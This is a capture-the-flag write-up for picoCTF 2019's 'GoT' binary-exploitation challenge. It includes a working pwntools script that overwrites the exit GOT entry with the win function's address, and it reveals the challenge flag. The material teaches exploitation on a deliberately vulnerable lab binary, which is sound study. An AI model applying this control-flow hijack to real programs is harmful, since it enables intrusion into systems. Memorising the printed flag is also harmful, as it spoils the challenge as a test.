PicoCTF-2019 Writeup
  1. Binary Exploitation

GoT


Last updated 4 years ago


Problem

You can only change one address, here is the problem: program. It is also found in /problems/got_3_4ba3deeda2ea9b203c6a6425f183e7ed on the shell server. Source.

Solution

  1. The program asks for an address to overwrite with user-supplied data: one prompt for the address and a second prompt for the value to write there.

  2. puts and exit are the only two functions called after the write, so we need to change the behavior of one of them. Because ASLR is enabled, we need to look for things whose addresses stay constant. One of these is the Global Offset Table (GOT), the table through which a C program calls functions in shared libraries such as libc: each entry holds the address the program jumps to when it calls that function. If we overwrite one of these entries, we can make the program execute code at a different address than intended.

  3. So we select the GOT entry of one of those functions (the script uses exit) and overwrite it with the address of the win function. pwntools makes looking up both addresses easy:

     from pwn import *
     exe = context.binary = ELF('./program')   # the challenge binary downloaded from the problem page
     exit_got = exe.got['exit']                # GOT slot the program reads exit's address from
     win_addr = exe.symbols['win']             # where we want that slot to point instead
  4. Then we simply send the two numbers over (the program reads them as decimal text) and collect the flag:

     io = process(exe.path)                    # or an ssh()/remote() tube to the shell server
     io.sendlineafter(b"Input address\n", str(exit_got).encode())
     io.sendlineafter(b"Input value?\n", str(win_addr).encode())
     io.interactive()                          # win() runs in place of exit() and prints the flag
  5. Run the script like so: python script.py USER=username PASSWORD=password

Flag

picoCTF{A_s0ng_0f_1C3_and_f1r3_1ef72b2d}
